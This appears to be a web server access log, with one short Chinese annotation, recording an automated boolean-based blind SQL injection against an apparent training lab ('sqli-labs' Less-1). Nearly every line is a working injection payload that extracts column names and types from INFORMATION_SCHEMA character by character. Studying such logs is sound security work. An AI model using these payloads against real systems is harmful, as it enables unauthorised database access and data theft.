10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),3,1))>102 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),3,1))>101 AND 'GMlF'='GMlF HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),4,1))>96 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),4,1))>112 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),4,1))>120 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),4,1))>116 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),4,1))>114 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),4,1))>113 AND 'GMlF'='GMlF HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),5,1))>96 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),5,1))>112 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),5,1))>104 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),5,1))>108 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),5,1))>110 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),5,1))>109 AND 'GMlF'='GMlF HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),6,1))>96 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),6,1))>112 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),6,1))>104 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),6,1))>100 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),6,1))>98 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),6,1))>97 AND 'GMlF'='GMlF HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),7,1))>96 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),7,1))>112 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),7,1))>104 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),7,1))>108 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),7,1))>110 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),7,1))>109 AND 'GMlF'='GMlF HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),8,1))>96 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),8,1))>112 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),8,1))>104 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),8,1))>100 AND 'GMlF'='GMlF HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),8,1))>102 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),8,1))>101 AND 'GMlF'='GMlF HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),9,1))>96 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),9,1))>48 AND 'GMlF'='GMlF HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),9,1))>1 AND 'GMlF'='GMlF HTTP/1.1" 200 670

varchar(20) 类型

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),1,1))>64 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),1,1))>96 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),1,1))>112 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),1,1))>120 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),1,1))>116 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),1,1))>118 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),1,1))>117 AND 'Iilo'='Iilo HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),2,1))>96 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),2,1))>112 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),2,1))>104 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),2,1))>100 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),2,1))>98 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),2,1))>97 AND 'Iilo'='Iilo HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),3,1))>96 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),3,1))>112 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),3,1))>120 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),3,1))>116 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),3,1))>114 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),3,1))>113 AND 'Iilo'='Iilo HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),4,1))>96 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),4,1))>112 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),4,1))>104 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),4,1))>100 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),4,1))>98 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),4,1))>99 AND 'Iilo'='Iilo HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),5,1))>96 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),5,1))>112 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),5,1))>104 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),5,1))>100 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),5,1))>102 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),5,1))>103 AND 'Iilo'='Iilo HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),6,1))>96 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),6,1))>112 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),6,1))>104 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),6,1))>100 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),6,1))>98 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),6,1))>97 AND 'Iilo'='Iilo HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),7,1))>96 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),7,1))>112 AND 'Iilo'='Iilo HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),7,1))>120 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),7,1))>116 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),7,1))>114 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),7,1))>113 AND 'Iilo'='Iilo HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),8,1))>96 AND 'Iilo'='Iilo HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:59:13  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND column_name=0x757365726e616d65 AND table_schema=0x7365637572697479),8,1))>48 AND 'Iilo'='Iilo HTTP/1.1" 200 670
